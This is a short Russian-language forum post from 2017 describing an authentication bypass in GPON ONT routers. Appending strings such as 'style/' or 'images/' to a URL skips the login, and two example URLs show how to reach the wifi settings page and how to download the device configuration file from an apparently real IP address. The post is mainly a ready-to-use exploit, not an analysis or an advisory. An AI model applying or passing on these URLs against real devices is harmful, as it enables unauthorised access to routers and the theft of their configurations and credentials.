
17.07.2017, 22:35
|
|
Постоянный
Регистрация: 21.07.2015
Сообщений: 594
С нами:
5691926
Репутация:
171
|
|
Нашёл заодно уязвимость в этих ONT GPON - обход авторизации при наличии в URL какой-либо из строк: "style/", "script/", "images/", "floid.html", "FLoidForm" и т.д.
Например:
Код:
http://2.133.252.l3/wifi.html?style/
или скачиваем конфиг:
Код:
http://2.133.252.l3/download/ont_config.dat?autorun
|
|
|